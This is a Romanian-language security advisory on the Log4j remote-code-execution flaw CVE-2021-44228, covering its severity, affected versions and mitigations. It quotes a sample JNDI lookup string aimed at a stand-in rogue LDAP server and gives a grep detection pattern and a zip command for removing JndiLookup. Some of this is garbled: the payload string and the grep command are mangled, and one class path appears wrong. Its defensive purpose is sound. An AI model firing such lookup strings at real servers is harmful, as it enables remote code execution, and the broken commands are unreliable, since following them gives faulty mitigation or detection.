O vulnerabilitate critică (0-day) într-o bibliotecă populară Java, numită „Log4j”, poate fi exploatată liber de atacatori. La momentul divulgării publice a informației, nu era disponibil niciun patch de securitate pentru a o remedia, dar între timp au apărut o serie de măsuri de atenuare.
Dezvoltată și întreținută de Apache, biblioteca este adoptată pe scară largă și utilizată în multe produse software comerciale și open-source ca un framework de înregistrare a informațiilor pentru Java.
Descriere
Severitatea vulnerabilității (CVE-2021-44228) este una ridicată, deoarece aceasta poate fi exploatată de la distanță de un atacator neautentificat prin executarea codului (remote code execution – RCE). Mai mult, CVE-2021-44228 are un scor de 10 (din 10) în sistemul comun de notare a vulnerabilității (CVSS).
Problema de securitate provine din modul în care mesajele jurnal sunt gestionate de procesorul log4j. În cazul în care un atacator trimite un mesaj special conceput (care conține un șir de caractere cum ar fi $-jndi:ldap://rogueldapserver.com/a}), acest lucru poate duce la încărcarea unei clase de coduri externe sau a căutării mesajelor și la executarea codului respectiv, ceea ce duce la o situație cunoscută sub numele de execuție de cod de la distanță.
Impact
Cu toate că vulnerabilitatea are un grad de complexitate ridicat, exploatarea sa cu succes depinde de mai multe condiții, cum ar fi utilizarea JVM, configurația reală, etc. Versiunile log4j între 2.0 și 2.14.1 sunt afectate.
Deoarece mulți furnizori terți se bazează pe Log4j pentru produsele lor, s-a lucrat intens pentru lansarea unor patch-uri dedicate pentru produsele lor. În ultimele 48 de ore, mulți furnizori au publicat astfel de patch-uri de securitate.
Remediere
Recomandăm verificarea urgentă a folosirii Log4j în software-ul utilizat și aplicarea patch-urilor corespunzătoare cât mai curând posibil. În cazul în care nu se pot aplica patch-uri, este indicată luarea oricărei măsuri de atenuare, pentru a evita alte daune.
- Obțineți o imagine de ansamblu a sistemelor și a software-ului care utilizează log4j în mediul dvs. (acest lucru poate fi o sarcină consumatoare de timp, deci ar fi bine să începeți urgent).
- Aplicați imediat patch-urile de securitate corespunzătoare pentru software-ul/dispozitivele care folosesc internetul
- Aplicați patch-urile de securitate corespunzătoare deopotrivă pentru software-ul/dispozitivele interne cât mai curând posibil
- În cazul în care aplicarea patch-urilor nu este posibilă din varii motive, recomandăm insistent izolarea sistemului de accesul la internet și/sau aplicarea următoarelor măsuri de atenuare:
- Pentru versiunea >=2.10: setați formatMsgNoLookups la true
- Pentru versiunile de la 2.0 la 2.10.0: eliminați clasa LDAP din log4j complet prin emiterea următoarei comenzi: zip -q -d log4j-core-*.jar org/apache/log4j/core/lookup/JndiLookup.class
- Pentru anumite versiuni JVM, este posibil să setați sun.jndi.rmi.object.trustURLCodebase și com.sun.jndi.cosnaming.object.trustURLCodebase pentru a atenua vulnerabilitatea. Unele versiuni JVM au deja acest lucru ca setare implicită
- Puteți verifica încercările de exploatare – indiferent dacă au avut succes sau nu – în jurnalele serverului dvs. web, utilizând următoarea comandă Linux/Unix: sudo egrep -i -r’\$\ & jndi:(ldap[s]?rmi…dns):/[^\n]+”/var/log/
Citeste mai mult pe : https://dnsc.ro/citeste/alerta-vulnerabilitate-zero-day-log4j-java